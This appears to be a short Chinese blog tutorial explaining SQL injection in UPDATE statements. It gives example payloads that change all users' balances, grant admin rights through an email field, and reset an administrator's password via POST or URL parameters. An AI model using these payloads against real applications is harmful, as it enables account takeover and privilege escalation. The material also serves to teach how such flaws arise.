1.UPDATE语句基础
修改用户名为hxf的密码为123456: UPDATE users SET password=’123456’ where uname=’hxf’;
修改所有用户名的密码为:123456: UPDATE users SET password=’123456’;#### 2.UPDATE与注入全集更新逻辑 $sql=“UPDATE users SET gold=gold+100000 WHERE uname=“.’$uname’; 正常传参:$name=hxf 结果:UPDATE users SET gold=gold+100000 where uname=‘hxf’;
注入传参:$name= ‘ or ‘1’=’1 结果:UPDATE game_user SET gold=gold+100000 where username=’ ‘ or ‘1’=’1’;#### 3.更新个人资料注入提权逻辑 更新email正常传参:hxf@abc.com 结果: Update user SET email=’hxf@abc.com’ Where uid=’$uid’
注入传参:hxf@abc.com ‘, isadmin= ‘ 1 结果: Update user SET email= ‘ hxf@abc.com ‘, isadmin= ‘ 1’ Where uname=’$uname’#### 4. POST传参修改后台管理员密码逻辑 正常传参: ‘ hxf123 ‘ 结果:Update users SET password=MD5(‘ hxf123 ‘) Where uname=’$uname’
注入传参:hxf’) Where uname=’admin’# 之后SQL语句变为Update users SET password=MD5(‘hxf123’) Where uname=’admin’#)’Where uname=’$uname’#### 5. URL传参修改后台管理员密码逻辑 正常传参:id=’123’ 结果:Update users SET password=MD5(‘hxf123’) Where uid=’$uid’
注入传参:’ or uname=’admin’ 结果:Update user SET password=MD5(‘hxf123’) Where uid=’’ or uname=’admin’
若有收获,就点个赞吧
0 人点赞
